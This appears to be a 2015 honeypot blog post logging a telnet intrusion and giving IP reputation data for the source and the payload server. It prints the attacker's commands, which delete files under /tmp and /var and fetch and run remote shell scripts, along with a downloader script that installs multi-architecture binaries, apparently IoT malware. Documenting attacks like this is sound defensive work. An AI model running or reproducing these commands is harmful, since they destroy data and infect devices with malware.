Donnerstag, 15. Oktober 2015

113.126.198.158 - Telnet code execution after login, download via 158.69.203.229

BEGIN OF TELNET DATA:
2015-10-14 09:48:52
Source IP: 113.126.198.158
Country: CN RiskScore: 2.9 Malware: []
sh
shelrm -rf /tmp/* /var/*;cd /tmp || cd /var/;wget http://158.69.203.229/ff.sh;sh ff.sh;ftpget -u anonymous -p anonymous 158.69.203.229 ff2.sh ff2.sh;sh ff2.sh;tftp -r ff3.sh -g 158.69.203.229;sh ff3.sh
User: root
Pass:

 END OF DATA
The first script is a simple
#!/bin/sh
cp /bin/busybox ./
wget http://158.69.203.229/arm;cat arm >busybox;rm -f arm;chmod 777 busybox;./busybox
wget http://158.69.203.229/mips;cat mips >busybox;rm -f mips;./busybox
wget http://158.69.203.229/mipsel;cat mipsel >busybox;rm -f mipsel;./busybox
wget http://158.69.203.229/ppc;cat ppc >busybox;rm -f ppc;./busybox
wget http://158.69.203.229/sh;cat sh >busybox;rm -f sh;./busybox
The FTP server is also public available
ftp> ls
227 Entering Passive Mode (158,69,203,229,209,227)
150 Opening ASCII mode data connection for file list
-rwxr-xr-x   1 root     root        41652 Oct 12 23:33 arm
-rw-r--r--   1 root     root          523 Oct 10 17:04 ff2.sh
-rwxr-xr-x   1 root     root        50743 Oct 15 03:28 find
-rwxr-xr-x   1 root     root        61572 Oct 12 23:33 mips
-rwxr-xr-x   1 root     root        61572 Oct 12 23:33 mipsel
-rwxr-xr-x   1 root     root        41128 Oct 12 23:33 ppc
-rwxr-xr-x   1 root     root        38324 Oct 12 23:33 sh
The file sh is
sh: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
The files are available via my DRIVE share 
the password is "infected" 

158.69.203[.]229

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS16276 OVH SAS
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/158.69.203.229

Feed search for 158.69.203[.]229

113.126.198[.]158

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4134 Chinanet
    Dynamic Source: IBM X-Force Exchange
  • Score: 2.9
  • Reference: https://exchange.xforce.ibmcloud.com/ip/113.126.198.158
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/113.126.198.158

Feed search for 113.126.198[.]158